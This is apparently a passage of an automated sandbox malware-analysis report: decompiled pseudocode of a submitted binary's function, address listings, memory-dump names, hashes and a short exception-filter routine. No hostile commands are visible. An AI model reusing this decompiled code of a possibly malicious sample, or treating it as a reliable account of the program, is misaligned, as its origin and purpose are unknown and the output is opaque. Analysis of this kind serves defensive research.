																												__eflags = _t716 - 5;
																												if(_t716 == 5) {
																													goto L151;
																												}
																												__eflags = _t716 - 1;
																												if(_t716 == 1) {
																													L149:
																													__eflags = _t446;
																													if(_t446 == 0) {
																														goto L159;
																													}
																													_push(_t697 + 0x1100);
																													_t501 = E00B677B8(_t622, _t697 + 0x10, _t582);
																													goto L155;
																												}
																												__eflags = _t716 - 2;
																												if(_t716 == 2) {
																													goto L149;
																												}
																												__eflags = _t716 - 3;
																												if(__eflags == 0) {
																													goto L149;
																												}
																												E00B62021(__eflags, 0x47, _t582 + 0x32, _t697 + 0x1100);
																												__eflags = 0;
																												_t646 = 0;
																												 *((char*)(_t721 - 0xf)) = 0;
																												goto L144;
																											}
																											__eflags = _t445;
																											if(_t445 != 0) {
																												goto L136;
																											}
																											_t508 = 0x50;
																											__eflags =  *(_t721 - 0x18) - _t508;
																											if( *(_t721 - 0x18) == _t508) {
																												goto L136;
																											}
																											_t446 = 1;
																											 *((char*)(_t721 - 0x10)) = 1;
																											goto L137;
																										}
																										__eflags =  *(_t582 + 0x6cdc);
																										if( *(_t582 + 0x6cdc) != 0) {
																											goto L132;
																										}
																										_t717 =  *(_t582 + 0x32fc);
																										_t695 =  *(_t582 + 0x32f8);
																										__eflags = _t717;
																										if(__eflags < 0) {
																											L131:
																											_t690 = 0;
																											__eflags = 0;
																											_t712 = _t697 + 0x10;
																											goto L132;
																										}
																										if(__eflags > 0) {
																											L119:
																											_t649 =  *(_t582 + 0x32f0);
																											_t650 = _t649 << 0xa;
																											__eflags = ( *(_t582 + 0x32f4) << 0x00000020 | _t649) << 0xa - _t717;
																											if(__eflags < 0) {
																												L130:
																												_t445 =  *(_t721 - 0xd);
																												goto L131;
																											}
																											if(__eflags > 0) {
																												L122:
																												__eflags =  *((intOrPtr*)(_t582 + 0x10)) - 1;
																												if( *((intOrPtr*)(_t582 + 0x10)) == 1) {
																													goto L130;
																												}
																												__eflags = _t717;
																												if(__eflags < 0) {
																													L129:
																													_t244 = _t721 - 0x1070; // -2160
																													E00B69A3C(_t244,  *(_t582 + 0x32f8),  *(_t582 + 0x32fc));
																													 *(_t721 - 0x28) =  *(_t582 + 0x32f8);
																													 *(_t721 - 0x24) =  *(_t582 + 0x32fc);
																													goto L130;
																												}
																												if(__eflags > 0) {
																													L126:
																													_t515 = E00B6981A(_t695);
																													__eflags = _t695 -  *(_t582 + 0x32f4);
																													if(__eflags < 0) {
																														goto L130;
																													}
																													if(__eflags > 0) {
																														goto L129;
																													}
																													__eflags = _t515 -  *(_t582 + 0x32f0);
																													if(_t515 <=  *(_t582 + 0x32f0)) {
																														goto L130;
																													}
																													goto L129;
																												}
																												__eflags = _t695 - 0x5f5e100;
																												if(_t695 < 0x5f5e100) {
																													goto L129;
																												}
																												goto L126;
																											}
																											__eflags = _t650 - _t695;
																											if(_t650 <= _t695) {
																												goto L130;
																											}
																											goto L122;
																										}
																										__eflags = _t695 - 0xf4240;
																										if(_t695 <= 0xf4240) {
																											goto L131;
																										}
																										goto L119;
																									}
																									L113:
																									_t202 = _t697 + 0xec;
																									 *_t202 =  *(_t697 + 0xec) + 1;
																									__eflags =  *_t202;
																									goto L114;
																								}
																								 *((char*)(_t721 - 0x12)) = 0;
																								_t517 = 0x50;
																								__eflags = _t616 - _t517;
																								if(_t616 != _t517) {
																									_t196 = _t721 - 0x1070; // -2160
																									__eflags = E00B698BC(_t196);
																									if(__eflags != 0) {
																										E00B62021(__eflags, 0x3b, _t582 + 0x32, _t697 + 0x1100);
																										E00B66E98(0xba1098, _t721, _t582 + 0x32, _t697 + 0x1100);
																									}
																								}
																								goto L113;
																							}
																							 *(_t697 + 0x10ff) = 1;
																							__eflags =  *((char*)(_t435 + 0x7201));
																							if( *((char*)(_t435 + 0x7201)) != 0) {
																								_t436 =  *(_t721 - 0xd);
																								goto L112;
																							}
																							goto L107;
																						}
																						 *(_t721 - 0xd) = _t431;
																						 *(_t721 - 0xe) = _t431;
																						_t185 = _t721 - 0x30b8; // -10424
																						_t525 = L00B71B7F(__eflags, _t185, 0, 0, _t431);
																						__eflags = _t525;
																						if(_t525 != 0) {
																							goto L104;
																						}
																						__eflags = 0;
																						 *(_t721 - 0x24) = 0;
																						L102:
																						_t187 = _t721 - 0x1070; // -2160
																						E00B6959A(_t187);
																						_t406 =  *(_t721 - 0x24);
																						goto L15;
																					}
																					_t180 = _t721 - 0x1070; // -2160
																					_push(_t582);
																					_t529 = E00B67FC0(_t697);
																					_t613 = _t529;
																					 *(_t721 - 0xe) = _t529;
																					L97:
																					__eflags = _t613;
																					if(_t613 != 0) {
																						goto L104;
																					}
																					goto L98;
																				}
																				__eflags =  *(_t721 - 0xe);
																				if( *(_t721 - 0xe) != 0) {
																					_t530 =  *(_t721 - 0x18);
																					__eflags = _t530 - 0x50;
																					if(_t530 != 0x50) {
																						_t657 = 0x49;
																						__eflags = _t530 - _t657;
																						if(_t530 != _t657) {
																							_t658 = 0x45;
																							__eflags = _t530 - _t658;
																							if(_t530 != _t658) {
																								_t531 =  *(_t697 + 8);
																								__eflags =  *((intOrPtr*)(_t531 + 0x7160)) - 1;
																								if( *((intOrPtr*)(_t531 + 0x7160)) != 1) {
																									 *(_t697 + 0xec) =  *(_t697 + 0xec) + 1;
																									_t178 = _t721 - 0x30b8; // -10424
																									_push(_t582);
																									E00B67DB2(_t697);
																								}
																							}
																						}
																					}
																				}
																				goto L102;
																			}
																			__eflags = _t611 - 5;
																			if(_t611 == 5) {
																				goto L88;
																			}
																			_t613 =  *(_t721 - 0xe);
																			__eflags = _t613;
																			if(_t613 == 0) {
																				goto L99;
																			}
																			_t616 =  *(_t721 - 0x18);
																			__eflags = _t616 - _t688;
																			if(_t616 == _t688) {
																				goto L105;
																			}
																			_t534 =  *(_t697 + 8);
																			__eflags =  *((char*)(_t534 + 0x7201));
																			if( *((char*)(_t534 + 0x7201)) != 0) {
																				goto L105;
																			}
																			_t719 = _t697 + 0x1100;
																			 *((char*)(_t721 - 0x12)) = 0;
																			_t536 = E00B6A231(_t719);
																			__eflags = _t536;
																			if(_t536 == 0) {
																				L86:
																				__eflags =  *((char*)(_t721 - 0x12));
																				if( *((char*)(_t721 - 0x12)) == 0) {
																					goto L104;
																				}
																				L87:
																				_t613 = 0;
																				 *(_t721 - 0xe) = 0;
																				goto L97;
																			}
																			__eflags =  *((char*)(_t721 - 0x12));
																			if( *((char*)(_t721 - 0x12)) != 0) {
																				goto L87;
																			}
																			__eflags = 0;
																			_push(0);
																			_push(_t582 + 0x32d8);
																			_push( *(_t582 + 0x32fc));
																			_t167 = _t721 - 0x12; // 0x7ee
																			_push( *(_t582 + 0x32f8));
																			_push(0x800);
																			_push(_t719);
																			_push(0);
																			_push( *(_t697 + 8));
																			E00B692A3();
																			goto L86;
																		}
																		__eflags =  *((char*)(_t582 + 0x3359));
																		if( *((char*)(_t582 + 0x3359)) == 0) {
																			goto L77;
																		}
																		_t137 = _t721 - 0x2c; // 0x7d4
																		_t543 = E00B80C4A(_t582 + 0x335a, _t137, 8);
																		_t723 = _t725 + 0xc;
																		__eflags = _t543;
																		if(_t543 == 0) {
																			goto L77;
																		}
																		__eflags =  *(_t582 + 0x6cdc);
																		_t697 =  *((intOrPtr*)(_t721 - 0x1c));
																		if( *(_t582 + 0x6cdc) != 0) {
																			goto L78;
																		}
																		__eflags =  *((char*)(_t697 + 0x10fe));
																		_t142 = _t721 - 0x30b8; // -10424
																		_push(_t582 + 0x32);
																		if(__eflags != 0) {
																			_push(6);
																			E00B62021(__eflags);
																			E00B66D83(0xba1098, 0xb);
																			 *(_t721 - 0xe) = 0;
																			goto L78;
																		}
																		_push(0x83);
																		E00B62021(__eflags);
																		E00B6F279( *(_t697 + 8) + 0x6024);
																		 *(_t721 - 4) =  *(_t721 - 4) | 0xffffffff;
																		_t147 = _t721 - 0x1174; // -2420
																		L00B6F204(_t147);
																	}
																}
																E00B66D83(0xba1098, 2);
																_t554 = E00B61F47(_t582);
																__eflags =  *(_t582 + 0x6ccc);
																_t406 = _t554 & 0xffffff00 |  *(_t582 + 0x6ccc) == 0x00000000;
																goto L15;
															}
															_t106 = _t721 - 0x10a8; // -2216
															_t556 = E00B67BE7(_t106, _t582 + 0x32d8);
															__eflags = _t556;
															if(_t556 == 0) {
																goto L65;
															}
															__eflags =  *((char*)(_t721 - 0x10ac));
															if( *((char*)(_t721 - 0x10ac)) == 0) {
																L63:
																 *(_t721 - 0xe) = 0;
																goto L65;
															}
															_t108 = _t721 - 0x10a8; // -2216
															_t558 = E00B67BCA(_t108, _t697);
															__eflags = _t558;
															if(_t558 == 0) {
																goto L65;
															}
															goto L63;
														}
														__eflags = _t707 - _t686;
														if(_t707 != _t686) {
															goto L65;
														}
														goto L59;
													}
													__eflags =  *((char*)(_t411 + 0x715c));
													if( *((char*)(_t411 + 0x715c)) == 0) {
														goto L65;
													}
													goto L57;
												}
												__eflags =  *(_t697 + 0x1100);
												if( *(_t697 + 0x1100) == 0) {
													goto L54;
												}
												 *(_t721 - 0xe) = 1;
												__eflags =  *(_t582 + 0x3330);
												if( *(_t582 + 0x3330) == 0) {
													goto L55;
												}
												goto L54;
											}
											__eflags = _t707 - _t400;
											_t401 = 1;
											if(_t707 != _t400) {
												goto L50;
											}
											goto L49;
										}
										L45:
										_t689 =  *(_t582 + 0x6ccc);
										 *(_t721 - 0xd) = _t689;
										 *(_t721 - 0x28) = _t689;
										__eflags = _t689;
										if(_t689 == 0) {
											goto L220;
										}
										_t685 = 0;
										__eflags = 0;
										goto L47;
									}
									_t398 =  *(_t697 + 8);
									__eflags =  *(_t398 + 0x6127);
									if( *(_t398 + 0x6127) == 0) {
										goto L44;
									}
									__eflags =  *(_t582 + 0x6ccc);
									if( *(_t582 + 0x6ccc) != 0) {
										goto L14;
									}
									 *(_t721 - 0x11) = 0;
									goto L45;
								}
								__eflags =  *(_t697 + 0xf4) -  *((intOrPtr*)(_t586 + 0xb334));
								if( *(_t697 + 0xf4) <  *((intOrPtr*)(_t586 + 0xb334))) {
									goto L29;
								}
								__eflags =  *((char*)(_t697 + 0xf9));
								if( *((char*)(_t697 + 0xf9)) != 0) {
									goto L14;
								}
								goto L29;
							}
							if(__eflags < 0) {
								L25:
								 *(_t582 + 0x32f8) = _t684;
								 *(_t582 + 0x32fc) = _t684;
								goto L26;
							}
							__eflags =  *(_t582 + 0x32f8) - _t684;
							if( *(_t582 + 0x32f8) >= _t684) {
								goto L26;
							}
							goto L25;
						}
						if(__eflags < 0) {
							L21:
							 *(_t582 + 0x32f0) = _t684;
							 *(_t582 + 0x32f4) = _t684;
							goto L22;
						}
						__eflags =  *(_t582 + 0x32f0) - _t684;
						if( *(_t582 + 0x32f0) >= _t684) {
							goto L22;
						}
						goto L21;
					}
					if(_t383 != 3) {
						__eflags = _t383 - 5;
						if(_t383 != 5) {
							goto L9;
						}
						__eflags =  *((char*)(_t582 + 0x45c4));
						if( *((char*)(_t582 + 0x45c4)) == 0) {
							goto L14;
						}
						_push(_t585);
						_push(_t684);
						_push(_t704);
						_push(_t582);
						_t573 = E00B78C8D();
						__eflags = _t573;
						if(_t573 != 0) {
							__eflags = 0;
							 *0xb93278( *((intOrPtr*)(_t582 + 0x6cb8)),  *((intOrPtr*)(_t582 + 0x6cbc)), 0);
							 *((intOrPtr*)( *((intOrPtr*)( *_t582 + 0x10))))();
							goto L17;
						}
						L13:
						E00B66D83(0xba1098, 1);
						goto L14;
					} else {
						if( *(_t697 + 0x10ff) != 0) {
							E00B67A0D(_t582, _t721,  *(_t697 + 8), _t582, _t697 + 0x1100);
						}
						goto L9;
					}
				}
				if( *((intOrPtr*)(__ecx + 0x67)) == 0) {
					goto L14;
				}
				_push(_t585);
				_push(0);
				_t704 = __ecx + 0x10;
				_push(_t704);
				_push(_t582);
				 *(_t721 - 0x20) = _t704;
				if(E00B78C8D() == 0) {
					goto L13;
				} else {
					_t585 =  *(_t721 - 0x18);
					_t684 = 0;
					goto L5;
				}
			}

0x00b68493
0x00b6849d
0x00b684a3
0x00b684a6
0x00b684aa
0x00b684ac
0x00b684b2
0x00b684b9
0x00b684bf
0x00b684e0
0x00b684e3
0x00b684e6
0x00b684e6
0x00b684ef
0x00b6857a
0x00b68580
0x00b68586
0x00b6859e
0x00b6859e
0x00b685a4
0x00b685bc
0x00b685bc
0x00b685bf
0x00b685c5
0x00b685e2
0x00b685e7
0x00b685eb
0x00b685f5
0x00b68600
0x00b68605
0x00b68607
0x00b6860b
0x00b6860d
0x00b6860f
0x00b68613
0x00b68615
0x00b68617
0x00b68617
0x00b68613
0x00b6861f
0x00b68624
0x00b68625
0x00b68632
0x00b68633
0x00b6863b
0x00b68642
0x00b68645
0x00b6869c
0x00b686a1
0x00b686a3
0x00b686a5
0x00b686ab
0x00b686b1
0x00b686b5
0x00b686b5
0x00b686b5
0x00b686b5
0x00b68647
0x00b6864a
0x00b68650
0x00b68652
0x00b68654
0x00b68658
0x00b6865a
0x00b68661
0x00b68666
0x00b68667
0x00b6866e
0x00b68673
0x00b6867d
0x00b6867f
0x00b68695
0x00b68681
0x00b68683
0x00b6868a
0x00b6868c
0x00b6868c
0x00b6867f
0x00b68658
0x00b68652
0x00b686be
0x00b686c3
0x00b686db
0x00b686e6
0x00b686ee
0x00b686f1
0x00b686f3
0x00b686f5
0x00b686f7
0x00b686fa
0x00b686fd
0x00b68703
0x00b68721
0x00b68721
0x00b68724
0x00b6873c
0x00b6873f
0x00b68744
0x00b6874a
0x00b6874b
0x00b6874d
0x00b68756
0x00b68756
0x00b68758
0x00b6875b
0x00b68765
0x00b6876c
0x00b68771
0x00b68773
0x00b68543
0x00b68543
0x00b68543
0x00b68545
0x00b6854b
0x00b68553
0x00b68553
0x00b68779
0x00b6877e
0x00b68786
0x00b68787
0x00b6878a
0x00b68791
0x00b68792
0x00b68799
0x00b6879c
0x00b687b3
0x00b687b3
0x00b687b6
0x00b687b6
0x00b687bb
0x00b687be
0x00b687c5
0x00b687c6
0x00b687c9
0x00b687cc
0x00b687d7
0x00b687d7
0x00b687da
0x00b687e1
0x00b687e1
0x00b687e7
0x00b687ee
0x00b687ef
0x00b687fd
0x00b68802
0x00b68804
0x00b6883c
0x00b6883f
0x00b6884b
0x00b6884b
0x00b6884b
0x00b6884e
0x00b6884e
0x00b68858
0x00b6885d
0x00b6885f
0x00b68883
0x00b68883
0x00b6888a
0x00000000
0x00000000
0x00b6888c
0x00b68896
0x00b6889b
0x00b6889d
0x00b6897f
0x00000000
0x00b6897f
0x00b688a3
0x00b688a6
0x00b688b4
0x00b688b5
0x00b688b5
0x00b688b7
0x00b688b9
0x00b688d5
0x00b688df
0x00b688e9
0x00b688fb
0x00b68900
0x00b68907
0x00b689a5
0x00b689a5
0x00b689a8
0x00b689a8
0x00b689ac
0x00b689b2
0x00b689b7
0x00b689bd
0x00b689c2
0x00b689ca
0x00b689cb
0x00b689ce
0x00b689d3
0x00b689d4
0x00b689d6
0x00b68a5f
0x00b68a61
0x00b68a66
0x00b68a68
0x00b68ab6
0x00b68ab9
0x00b68abb
0x00b68ad5
0x00b68ad7
0x00b68ad7
0x00b68ad8
0x00b68ad8
0x00b68adf
0x00b68b14
0x00b68b16
0x00b6910c
0x00b6910c
0x00b69110
0x00b69116
0x00b6911b
0x00b6911f
0x00b69122
0x00b69125
0x00b69127
0x00b69127
0x00b69127
0x00b69127
0x00b6912d
0x00b6912d
0x00b69131
0x00000000
0x00000000
0x00b69137
0x00b69139
0x00b68576
0x00b68576
0x00000000
0x00b68576
0x00b6913f
0x00b69145
0x00b68513
0x00b68515
0x00000000
0x00b68515
0x00b6914b
0x00b6914d
0x00000000
0x00b6914d
0x00b68b1c
0x00b68b1c
0x00b68b1f
0x00b68b1f
0x00b68b22
0x00b68b29
0x00b68b3b
0x00b68b3b
0x00b68b3e
0x00b68b40
0x00b68b87
0x00b68b87
0x00b68b8b
0x00b68b8d
0x00b68b95
0x00b68b95
0x00b68ba9
0x00b68baf
0x00b68bb5
0x00b68bbb
0x00b68bcc
0x00b68be2
0x00b68be7
0x00b68bed
0x00b68bf0
0x00b68bf6
0x00b68bf9
0x00b68bfc
0x00b68c03
0x00b68c06
0x00b68c0c
0x00b68c11
0x00b68c14
0x00b68c16
0x00b68c19
0x00b68c1c
0x00b68c1f
0x00b68c22
0x00b68c25
0x00b68c27
0x00b68cd6
0x00b68cd6
0x00b68cd9
0x00b68ce0
0x00b68ce7
0x00b68ceb
0x00b68d01
0x00b68d01
0x00b68d03
0x00b68d06
0x00b68d06
0x00b68d0a
0x00b68d0e
0x00b68d12
0x00b68e40
0x00b68e47
0x00b68e49
0x00b68e50
0x00b68e73
0x00b68e74
0x00b68e7a
0x00b68e7f
0x00b68e91
0x00b68e97
0x00b68e99
0x00b68e9f
0x00b68eb9
0x00b68e52
0x00b68e52
0x00b68e58
0x00b68e5e
0x00b68e5f
0x00b68e5f
0x00b68e50
0x00b68ebe
0x00b68ec0
0x00b68ec5
0x00b68ecc
0x00b68efe
0x00b68efe
0x00b68efe
0x00b68f00
0x00b68f02
0x00b68f02
0x00b68f09
0x00b68f13
0x00b68f1a
0x00b68f39
0x00b68f39
0x00b68f3d
0x00b68f40
0x00b68f98
0x00b68f98
0x00b68f9c
0x00b68f9f
0x00b68fb2
0x00b68fb2
0x00b68fb2
0x00b68fb4
0x00b68fb4
0x00b68fb8
0x00000000
0x00000000
0x00b68fbe
0x00b68fc1
0x00b68fc5
0x00b68fd1
0x00b68fd1
0x00b68fd5
0x00b68ff0
0x00b68ff0
0x00b68ff2
0x00b69007
0x00b69007
0x00b69009
0x00b690cd
0x00b690cd
0x00b690d0
0x00b690d7
0x00b690df
0x00b690e6
0x00b690eb
0x00b690ed
0x00b690f6
0x00b69100
0x00b69100
0x00b690ed
0x00b69105
0x00000000
0x00b69105
0x00b6900f
0x00b69014
0x00b69016
0x00b69019
0x00b6901f
0x00b6901f
0x00b69021
0x00b69033
0x00b69033
0x00b69039
0x00b6903e
0x00b69047
0x00b6905b
0x00b69062
0x00b69075
0x00b69077
0x00b69080
0x00b69085
0x00b6908b
0x00b6909a
0x00b690ad
0x00b690c0
0x00b690c2
0x00b690c5
0x00b690ca
0x00000000
0x00b690ca
0x00b69023
0x00b69029
0x00000000
0x00000000
0x00b6902b
0x00b69031
0x00000000
0x00000000
0x00000000
0x00b69031
0x00b6901b
0x00b6901d
0x00000000
0x00000000
0x00000000
0x00b6901d
0x00b68ff4
0x00b68ff7
0x00b68ffe
0x00000000
0x00000000
0x00b69004
0x00000000
0x00b69004
0x00b68fd7
0x00b68fd9
0x00000000
0x00000000
0x00b68fdb
0x00b68fe2
0x00000000
0x00000000
0x00b68fe8
0x00b68fea
0x00000000
0x00000000
0x00000000
0x00b68fea
0x00b68fc7
0x00b68fcb
0x00000000
0x00000000
0x00000000
0x00b68fcb
0x00b68fa1
0x00b68fa8
0x00000000
0x00000000
0x00b68faa
0x00b68fac
0x00000000
0x00000000
0x00b68fae
0x00000000
0x00b68fae
0x00b68f42
0x00b68f46
0x00000000
0x00000000
0x00b68f48
0x00b68f4a
0x00000000
0x00000000
0x00b68f4c
0x00b68f52
0x00b68f71
0x00b68f71
0x00b68f73
0x00b68f73
0x00b68f74
0x00b68f80
0x00b68f8c
0x00b68f90
0x00b68f95
0x00000000
0x00b68f95
0x00b68f54
0x00b68f5a
0x00b68f64
0x00b68f64
0x00b68f6b
0x00000000
0x00000000
0x00b68f6d
0x00000000
0x00b68f6d
0x00b68f5c
0x00b68f62
0x00000000
0x00000000
0x00000000
0x00b68f62
0x00b68f1c
0x00b68f22
0x00000000
0x00000000
0x00b68f24
0x00b68f2e
0x00b68f2e
0x00b68f30
0x00b68f32
0x00b68f32
0x00000000
0x00b68f30
0x00b68f26
0x00b68f2c
0x00000000
0x00000000
0x00000000
0x00b68f2c
0x00b68f0b
0x00000000
0x00b68f0b
0x00b68edd
0x00b68eef
0x00b68ef4
0x00b68ef6
0x00000000
0x00000000
0x00b68ef8
0x00b68efa
0x00000000
0x00b68efa
0x00b68d18
0x00b68d1e
0x00b68d21
0x00b68d8a
0x00b68d8a
0x00b68d8f
0x00b68d9c
0x00b68d9d
0x00b68da2
0x00b68da7
0x00b68dad
0x00b68db0
0x00b68db7
0x00b68db8
0x00b68dbd
0x00b68dc0
0x00b68dc2
0x00b68e19
0x00b68e19
0x00b68e1c
0x00b68e1c
0x00b68e23
0x00b68d57
0x00b68d57
0x00b68d59
0x00b68e36
0x00b68e36
0x00b68e36
0x00b68e38
0x00b68e38
0x00000000
0x00b68e38
0x00b68d5f
0x00b68d5f
0x00b68d61
0x00000000
0x00000000
0x00b68d67
0x00000000
0x00b68d67
0x00b68e29
0x00b68e2b
0x00000000
0x00000000
0x00b68d53
0x00b68d53
0x00000000
0x00b68d53
0x00b68dc4
0x00b68dcc
0x00000000
0x00000000
0x00b68dce
0x00b68dd4
0x00b68de0
0x00b68de1
0x00b68de4
0x00b68dfa
0x00b68dfb
0x00b68e02
0x00b68e07
0x00b68e09
0x00b68e0c
0x00b68e0c
0x00b68e0e
0x00b68d50
0x00b68d50
0x00000000
0x00b68d50
0x00b68e14
0x00000000
0x00b68e14
0x00b68de6
0x00b68de9
0x00b68dee
0x00b68dee
0x00b68df0
0x00000000
0x00b68df0
0x00b68d23
0x00b68d26
0x00000000
0x00000000
0x00b68d28
0x00b68d2b
0x00b68d6e
0x00b68d6e
0x00b68d70
0x00000000
0x00000000
0x00b68d7c
0x00b68d83
0x00000000
0x00b68d83
0x00b68d2d
0x00b68d30
0x00000000
0x00000000
0x00b68d32
0x00b68d35
0x00000000
0x00000000
0x00b68d44
0x00b68d49
0x00b68d4b
0x00b68d4d
0x00000000
0x00b68d4d
0x00b68ced
0x00b68cef
0x00000000
0x00000000
0x00b68cf3
0x00b68cf4
0x00b68cf8
0x00000000
0x00000000
0x00b68cfa
0x00b68cfc
0x00000000
0x00b68cfc
0x00b68c2d
0x00b68c33
0x00000000
0x00000000
0x00b68c39
0x00b68c41
0x00b68c47
0x00b68c49
0x00b68cd1
0x00b68cd1
0x00b68cd1
0x00b68cd3
0x00000000
0x00b68cd3
0x00b68c4f
0x00b68c59
0x00b68c59
0x00b68c69
0x00b68c6c
0x00b68c6e
0x00b68cce
0x00b68cce
0x00000000
0x00b68cce
0x00b68c70
0x00b68c76
0x00b68c76
0x00b68c7a
0x00000000
0x00000000
0x00b68c7e
0x00b68c80
0x00b68ca5
0x00b68cab
0x00b68cb7
0x00b68cc2
0x00b68ccb
0x00000000
0x00b68ccb
0x00b68c82
0x00b68c8c
0x00b68c8e
0x00b68c93
0x00b68c99
0x00000000
0x00000000
0x00b68c9b
0x00000000
0x00000000
0x00b68c9d
0x00b68ca3
0x00000000
0x00000000
0x00000000
0x00b68ca3
0x00b68c84
0x00b68c8a
0x00000000
0x00000000
0x00000000
0x00b68c8a
0x00b68c72
0x00b68c74
0x00000000
0x00000000
0x00000000
0x00b68c74
0x00b68c51
0x00b68c57
0x00000000
0x00000000
0x00000000
0x00b68c57
0x00b68b8f
0x00b68b8f
0x00b68b8f
0x00b68b8f
0x00000000
0x00b68b8f
0x00b68b46
0x00b68b49
0x00b68b4a
0x00b68b4d
0x00b68b4f
0x00b68b5a
0x00b68b5c
0x00b68b6b
0x00b68b7d
0x00b68b7d
0x00b68b5c
0x00000000
0x00b68b4d
0x00b68b2b
0x00b68b32
0x00b68b39
0x00b68b84
0x00000000
0x00b68b84
0x00000000
0x00b68b39
0x00b68ae2
0x00b68ae5
0x00b68aec
0x00b68af3
0x00b68af8
0x00b68afa
0x00000000
0x00000000
0x00b68afc
0x00b68afe
0x00b68b01
0x00b68b01
0x00b68b07
0x00b68b0c
0x00000000
0x00b68b0c
0x00b68abd
0x00b68ac6
0x00b68ac7
0x00b68acc
0x00b68ace
0x00b68ad1
0x00b68ad1
0x00b68ad3
0x00000000
0x00000000
0x00000000
0x00b68ad3
0x00b68a6a
0x00b68a6e
0x00b68a74
0x00b68a77
0x00b68a7b
0x00b68a83
0x00b68a84
0x00b68a87
0x00b68a8b
0x00b68a8c
0x00b68a8f
0x00b68a91
0x00b68a97
0x00b68a9d
0x00b68a9f
0x00b68aa5
0x00b68aac
0x00b68aaf
0x00b68aaf
0x00b68a9d
0x00b68a8f
0x00b68a87
0x00b68a7b
0x00000000
0x00b68a6e
0x00b689dc
0x00b689df
0x00000000
0x00000000
0x00b689e1
0x00b689e4
0x00b689e6
0x00000000
0x00000000
0x00b689ec
0x00b689ef
0x00b689f2
0x00000000
0x00000000
0x00b689f8
0x00b689fb
0x00b68a02
0x00000000
0x00000000
0x00b68a0a
0x00b68a11
0x00b68a14
0x00b68a19
0x00b68a1b
0x00b68a4c
0x00b68a4c
0x00b68a50
0x00000000
0x00000000
0x00b68a56
0x00b68a58
0x00b68a5a
0x00000000
0x00b68a5a
0x00b68a1d
0x00b68a21
0x00000000
0x00000000
0x00b68a23
0x00b68a2b
0x00b68a2c
0x00b68a2d
0x00b68a33
0x00b68a36
0x00b68a3d
0x00b68a42
0x00b68a43
0x00b68a44
0x00b68a47
0x00000000
0x00b68a47
0x00b6890d
0x00b68914
0x00000000
0x00000000
0x00b6891c
0x00b68927
0x00b6892c
0x00b6892f
0x00b68931
0x00000000
0x00000000
0x00b68933
0x00b6893a
0x00b6893d
0x00000000
0x00000000
0x00b6893f
0x00b68946
0x00b68950
0x00b68951
0x00b6898b
0x00b6898d
0x00b68999
0x00b689a0
0x00000000
0x00b689a0
0x00b68953
0x00b68958
0x00b68966
0x00b6896b
0x00b6896f
0x00b68975
0x00b68975
0x00b68883
0x00b68868
0x00b6886f
0x00b68874
0x00b6887b
0x00000000
0x00b6887b
0x00b6880d
0x00b68813
0x00b68818
0x00b6881a
0x00000000
0x00000000
0x00b6881c
0x00b68823
0x00b68835
0x00b68837
0x00000000
0x00b68837
0x00b68826
0x00b6882c
0x00b68831
0x00b68833
0x00000000
0x00000000
0x00000000
0x00b68833
0x00b687dc
0x00b687df
0x00000000
0x00000000
0x00000000
0x00b687df
0x00b687ce
0x00b687d5
0x00000000
0x00000000
0x00000000
0x00b687d5
0x00b6879e
0x00b687a5
0x00000000
0x00000000
0x00b687a7
0x00b687ab
0x00b687b1
0x00000000
0x00000000
0x00000000
0x00b687b1
0x00b6874f
0x00b68752
0x00b68754
0x00000000
0x00000000
0x00000000
0x00b68754
0x00b68726
0x00b68726
0x00b6872c
0x00b6872f
0x00b68732
0x00b68734
0x00000000
0x00000000
0x00b6873a
0x00b6873a
0x00000000
0x00b6873a
0x00b68705
0x00b68708
0x00b6870e
0x00000000
0x00000000
0x00b68710
0x00b68716
0x00000000
0x00000000
0x00b6871c
0x00000000
0x00b6871c
0x00b685cd
0x00b685d3
0x00000000
0x00000000
0x00b685d5
0x00b685dc
0x00000000
0x00000000
0x00000000
0x00b685dc
0x00b685a6
0x00b685b0
0x00b685b0
0x00b685b6
0x00000000
0x00b685b6
0x00b685a8
0x00b685ae
0x00000000
0x00000000
0x00000000
0x00b685ae
0x00b68588
0x00b68592
0x00b68592
0x00b68598
0x00000000
0x00b68598
0x00b6858a
0x00b68590
0x00000000
0x00000000
0x00000000
0x00b68590
0x00b684f8
0x00b6851c
0x00b6851f
0x00000000
0x00000000
0x00b68521
0x00b68528
0x00000000
0x00000000
0x00b6852a
0x00b6852b
0x00b6852c
0x00b6852d
0x00b6852e
0x00b68533
0x00b68535
0x00b68558
0x00b6856c
0x00b68574
0x00000000
0x00b68574
0x00b68537
0x00b6853e
0x00000000
0x00b684fa
0x00b68501
0x00b6850e
0x00b6850e
0x00000000
0x00b68501
0x00b684f8
0x00b684c4
0x00000000
0x00000000
0x00b684c6
0x00b684c7
0x00b684c8
0x00b684cb
0x00b684cc
0x00b684cd
0x00b684d7
0x00000000
0x00b684d9
0x00b684d9
0x00b684dc
0x00000000
0x00b684dc

APIs

__EH_prolog.LIBCMT ref: 00B68493

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 8996a547d4dfecc002070b4ef19180cfebac804472f0d3f6c86d92722e7aa993
Instruction ID: 62c27579fea4479b7df76f16d838f1b97e483d69b8951fd6a376e2fc784d4c46
Opcode Fuzzy Hash: 8996a547d4dfecc002070b4ef19180cfebac804472f0d3f6c86d92722e7aa993
Instruction Fuzzy Hash: 5F82F871904245AEDF25DF64C895BFABBF9EF15300F0842F9E8499B142DB395A88CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00B7F9D5 Relevance: 1.5, APIs: 1, Instructions: 3
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B7F9D5() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E00B7F9F0); // executed
				return _t1;
			}

0x00b7f9da
0x00b7f9e0

APIs

SetUnhandledExceptionFilter.KERNELBASE(Function_0001F9F0,00B7F3A5), ref: 00B7F9DA

